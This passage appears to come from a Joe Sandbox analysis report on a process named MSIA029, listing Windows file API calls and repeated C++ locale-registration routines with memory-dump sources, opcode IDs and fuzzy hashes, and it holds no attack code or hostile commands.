                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,80A20388), ref: 00F3CD1C
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD3C
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD6D
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD86
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3604237281-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F3D7EE
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D7F8
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3D849
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D869
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F427A9
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F427B3
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42804
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42824
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: fc3c9ceedacc7679168e700b1e22e505c8643a1d0c747089e59a08e1e299701b
                                                                                                                                                                                                                                                  • Instruction ID: a1f5129ee5b432a0563599b4d7998b4819e2ef715f2e01ffb841606d9e54bf11
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc3c9ceedacc7679168e700b1e22e505c8643a1d0c747089e59a08e1e299701b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E801C431900219DBCB05EBA49C416BE7B61BF84720F240459FE046B3D2CF789E05EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F3D759
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D763
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3D7B4
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D7D4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 59f6ec065bf249f60d107bb4d9bb31ac94f9b45102061ceadd9114071bc3ba6a
                                                                                                                                                                                                                                                  • Instruction ID: e6aa658845bbb121e229d19137c576396916c7bc0d12980cc0a0854e6be4f21b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59f6ec065bf249f60d107bb4d9bb31ac94f9b45102061ceadd9114071bc3ba6a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6401C036900219DBCB05EB649C466BE7BA1AF80730F240509F9146B3D2CF789E05EBA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42714
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4271E
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4276F
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4278F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: dbc647b414d1a3e625cbfabbc67abc02a1addc652d6392f0dea905dd5bd500b0
                                                                                                                                                                                                                                                  • Instruction ID: 1ef5668268b14c94ae8f5f5172690fb283ece0ac83b9013291046bc8f71b2acd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc647b414d1a3e625cbfabbc67abc02a1addc652d6392f0dea905dd5bd500b0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9901C03590021ADBCB05FB648C45ABE7FB1BF84760F240559F9146B2D2CF789E05AB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F428D3
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F428DD
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4292E
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4294E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: bfe93805af8b9b1601ce4dcb64efd033c2150b06ca44362521f467468a76a4fc
                                                                                                                                                                                                                                                  • Instruction ID: 8b465e6ed646679e45021f85be36f7fd5f748ce909e6dc61849e7100831128a9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe93805af8b9b1601ce4dcb64efd033c2150b06ca44362521f467468a76a4fc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF01C031900619DBCB05EB648C516BE7BB1AF84730F240419F914AB2D2CFB89E05FB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4283E
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42848
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42899
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F428B9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: e20f554653cd1a90f54a0856624c2a71c1ee2477162cc89cd5a99a806fbc5629
                                                                                                                                                                                                                                                  • Instruction ID: 2ef76981eb427b07a01295e26658abca04a02e4e47d8419327f8f8b35b983e05
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e20f554653cd1a90f54a0856624c2a71c1ee2477162cc89cd5a99a806fbc5629
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E201D631D00519DBCB05EB64CC41ABE7B71BF80760F240519F9146B2D2CF789E05AB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4E974
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E97E
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4E9CF
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E9EF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 83ece8bae81e0cef8b55fe3888d31d95fef50ea688a5f5b24b0de6c1cf0e1020
                                                                                                                                                                                                                                                  • Instruction ID: d346ff952cc74fbd5fad278a98893f5e87971d98b822b2827a8c6ce8d7ea0d88
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83ece8bae81e0cef8b55fe3888d31d95fef50ea688a5f5b24b0de6c1cf0e1020
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4901D231900229DBCB05EB68CC416BE7BA0BF80720F250549FA106B3D2DF789E01FB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EA09
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EA13
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4EA64
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EA84
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 8843c578382c838e7cbb7c853419a181c91cacda15f2f375748aebf37799f97c
                                                                                                                                                                                                                                                  • Instruction ID: 28f1b08247a5bc8eb2730b30590a1217b8c568395f9a8e7cf4e887dd2bdec752
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8843c578382c838e7cbb7c853419a181c91cacda15f2f375748aebf37799f97c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8801C031900219DBCB05EB648C456BE7B60BF84730F2A0909F900AB3D2CF7C9E05AB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EBC8
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EBD2
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4EC23
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EC43
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 71a9099b1ed0ab9cf121c3b50d30984dbf00ce10a1362144ffdbc7167b45d622
                                                                                                                                                                                                                                                  • Instruction ID: ef79ea34dee95957e4b35d77ce56ad2102214fc497a9e6662f94e52ae458c276
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a9099b1ed0ab9cf121c3b50d30984dbf00ce10a1362144ffdbc7167b45d622
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B001C431900119DBCB15EB648C466BE7B70BF80760F240449FA146B2D2CF789E05E791
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42BBC
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42BC6
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42C17
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42C37
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 0c33af507821651affa5e8f3efdbe6550cd2add6cbc1d0ab62f6caf45c1b6ac9
                                                                                                                                                                                                                                                  • Instruction ID: d8490209b1eec59f888a2a37465c2e5511af13464640d3a5ec6d586248030a21
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c33af507821651affa5e8f3efdbe6550cd2add6cbc1d0ab62f6caf45c1b6ac9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3501C431900619DBCB15FBA49C416BE7B70AF80730F254419FA106B2D2DF789E05EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42CE6
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42CF0
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42D41
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42D61
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: d4a58143b9fc464dfc5050721143665165d3805cdb41ce2b0e7252ba981e8265
                                                                                                                                                                                                                                                  • Instruction ID: 0530460ec83afea53cf67d2400ab243ccd203f0cb20771b4071cf2379c38bcd3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4a58143b9fc464dfc5050721143665165d3805cdb41ce2b0e7252ba981e8265
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4101AD31D00219DBCB15EB649C41AAE7B71BF84720F240559F9046B2D2CFB89E05EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EC5D
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EC67
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4ECB8
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4ECD8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2854358121-0
                                                                                                                                                                                                                                                  • Opcode ID: 789ae0a4edc045f20913f2097e4d18429385a1c917605424d874cd0f4d06687d
                                                                                                                                                                                                                                                  • Instruction ID: af0b257b97dee98e9525ceafa08473e3e5088e3e08a5ce97722b63d61d6fb2db
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 789ae0a4edc045f20913f2097e4d18429385a1c917605424d874cd0f4d06687d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9801AD31D00219DBCB05AB649C81AAE7B71BF80770F250409FA056B2D2CF789A05EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42C51
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42C5B
